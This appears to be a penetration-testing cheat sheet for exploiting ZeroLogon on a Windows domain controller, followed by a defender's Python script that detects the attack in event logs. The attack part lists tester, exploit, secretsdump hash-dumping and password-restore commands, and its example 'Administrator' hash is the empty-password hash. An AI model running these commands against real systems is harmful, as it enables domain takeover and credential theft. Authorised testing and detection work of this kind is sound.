Abusing ZeroLogon
  • Attacks the DC by resetting its machine account password to null and taking over the DC. CAREFUL: THIS CAN DESTROY THE DC (with an empty machine account password the DC can no longer authenticate or replicate until the password is restored).

  • First check whether the target is vulnerable. Note: this is useful in a pentest to report to the customer that they are vulnerable without actually running the exploit.

    └─# python3 zerologon_tester.py HYDRA-DC
    Performing authentication attempts...
    Success! DC can be fully compromised by a Zerologon attack.
  • Change the DC machine account password to an empty string: python3 exploit.py HYDRA-DC

  • Check whether it worked: secretsdump.py -just-dc DOMAIN/DOMAIN-CONTROLLER\$@IP-OF-DC. Example: secretsdump.py -just-dc MARVEL/HYDRA-DC\$@

  • If the hashes dump without any password being asked for, the DC machine account password is now empty and the DC is owned.

  • Restore the DC machine account password

    • Use the Administrator hash from the dump to retrieve the DC's plain_password_hex: secretsdump.py administrator@ -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

    • Restore the password: python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip -hexpass <Put here the hexpass you just got>. The console should print "Change password OK".

  • There is also another way to exploit Zerologon without resetting the DC password; see Dirk-Jan Mollema's article on this.
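As an added defender-side example (not part of this cheat sheet), the Python below flags the log artifacts the chain above leaves on a DC: a 4742 "computer account was changed" event where the password reset was performed by ANONYMOUS LOGON (a machine normally rotates its own password), and the Netlogon events 5827-5831 that the August 2020 patch added to report vulnerable secure-channel connections. The event records are constructed and simplified, and the "Machine" field name is an assumption.

```python
"""Flag Windows events that indicate a Zerologon-style DC machine account
password reset. Event records below are constructed, not real log exports."""
from typing import Iterable, List

# Netlogon event IDs introduced by the August 2020 Zerologon patch.
NETLOGON_DENIED = {5827, 5828}        # vulnerable secure-channel connection denied
NETLOGON_ALLOWED = {5829, 5830, 5831}  # vulnerable connection allowed (no enforcement / exception)


def find_zerologon_indicators(events: Iterable[dict]) -> List[str]:
    findings = []
    for e in events:
        eid = e.get("EventID")
        if eid == 4742:
            # A computer account normally changes its own password, so the
            # subject equals the target. Zerologon's reset arrives over an
            # unauthenticated Netlogon session: subject is ANONYMOUS LOGON
            # and PasswordLastSet carries a new value instead of "-".
            subj = e.get("SubjectUserName", "")
            target = e.get("TargetUserName", "")
            if (subj.upper() == "ANONYMOUS LOGON" and target.endswith("$")
                    and e.get("PasswordLastSet", "-") != "-"):
                findings.append(f"{eid} anonymous password reset of {target}")
        elif eid in NETLOGON_DENIED:
            # Patched DC refused a vulnerable connection: attempt, not compromise.
            findings.append(f"{eid} vulnerable Netlogon connection denied from {e.get('Machine', '?')}")
        elif eid in NETLOGON_ALLOWED:
            # DC still accepts vulnerable connections: enforcement mode is not on.
            findings.append(f"{eid} vulnerable Netlogon connection allowed from {e.get('Machine', '?')}; enable enforcement mode")
    return findings


# Constructed sample records ("Machine" field name is an assumption).
SAMPLE_EVENTS = [
    # benign: the DC rotating its own machine account password
    {"EventID": 4742, "SubjectUserName": "HYDRA-DC$", "TargetUserName": "HYDRA-DC$",
     "PasswordLastSet": "2020-10-01T03:00:00Z"},
    # the reset performed by the exploit step above
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "HYDRA-DC$",
     "PasswordLastSet": "2020-10-01T14:22:10Z"},
    {"EventID": 5829, "Machine": "10.0.0.55"},
]

if __name__ == "__main__":
    for finding in find_zerologon_indicators(SAMPLE_EVENTS):
        print(finding)
```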
